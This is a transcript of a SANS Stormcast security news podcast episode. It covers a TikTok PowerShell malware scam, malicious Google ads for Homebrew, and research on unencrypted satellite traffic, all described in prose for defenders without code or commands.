Hello and welcome to the Monday, October 20th 2025
edition of the SANS United Storm Center's Stormcast. My
name is Johannes Ullrich, recording today from
Jacksonville, Florida. And this episode is brought to you
by the SANS.edu graduate certificate program in
cybersecurity engineering. Tiktok apparently has learned
from ClickFix. Xavier came across a TikTok video that
advertised ways to get Photoshop for free. But of
course, instead of getting free versions of expensive
software, you're actually stuck with malware. The
technique used here is very similar to what's commonly
used as ClickFix where you're being prompted with a captcha
and then you have to essentially copy paste
PowerShell code into your PowerShell window on your
Windows machine. Well, here, the difference is only that
it's done via TikTok. So the TikTok video basically tells
you how to copy or how to type the PowerShell script into
your PowerShell window that of course, you're first being
instructed to start as an administrator. And then while
the malicious code is executed in this code, additional
malware is being downloaded that will then essentially
download info stealers or whatever the attacker would
like to load on your system. Good news is that virus total
promises a good recognition rate for at least this
particular version of this scam. But there are hundreds
literally out there that do similar things that again, no
promise free software, but then trick you into actually
executing this PowerShell code. And it's not always that
obvious really what you're executing here, because
they're kind of doing the Windows equivalent of just
downloading some code and then piping it to a shell. So it's
not that you're actually typing the code here into your
PowerShell window, you're really just using PowerShell
to download a file from a website and then executing it,
which is a little bit more stealthy. And maybe people
think it's even if they understand kind of what that
PowerShell does, that they think, hey, you know, I'm just
downloading some free software or some patch for the software
to make it free. And that's maybe why this particular
trick is still successful. And then talking about victims
being tricked into executing malicious code. Well, we do
have another case where actually Google ads are being
used to advertise tools that are particularly popular with
developers and you're somewhat focusing on macOS like
Homebrew. Homebrew is this package manager allows you to
install a lot of open source packages on macOS. I use it
very popular, particularly with developers for installing
additional tools, little command line utilities and
such, Git extensions and things like that. So
definitely one of the target groups here are developers and
yes, they're then ending up again with info stealers. And
that's what hunt.io here discovered as part of their
blog post. Researchers at the University of California at
San Diego, as well as the University of Maryland have
demonstrated that it's relatively easy to not only
eavesdrop on signals being sent to and from satellites,
but also that much of that traffic is unencrypted. The
information sort of was presented at a recent
conference and the paper has now been made public. You may
have seen some news reports about it about a week ago, but
now we have the actual paper available and also no more
paywall for the actual information in the paper. The
lesson here really is something that's not really
that new as soon as the network traffic leaves the
network jack on your system. It does enter hostile
territory. So you better make sure that you properly
authenticate that you are properly encrypting your
traffic and that you make sure that the traffic is not being
altered in transit. And while your two main mechanisms to
doing this is of course, TLS, that's usually the simplest
way and the most common way how it is done, or via one of
the many VPN options that you have available. There are some
cases where you don't really have a choice. And the one
example here that they point out is a good old phone calls,
which are often also not encrypted. But basically, the
satellite traffic itself does not offer any encryption. So
you rely on whatever traffic is being sent to be already
being encrypted before it's being passed to the satellite
network. Of course, this also depends on the particular
technology being used by the satellite. This here is sort
of a more traditional telecommunication satellite,
which really is just a relay of traffic. It doesn't really
sort of alter the traffic like encryption or anything like
that. That's not really the point of a satellite like
this. More modern satellites like Starlink and similar
constellations, they are actually encrypting traffic,
of course, in part also to protect the network against
the rogue access and making sure everybody has a proper
account that accesses the network. Well, that's it for
today. Remember, on Saturday, I'll be speaking at B-Sides
Augusta. So hope to see some listeners there in person.
Otherwise, thanks for liking and subscribing to this
podcast and talk to you again tomorrow. Bye.
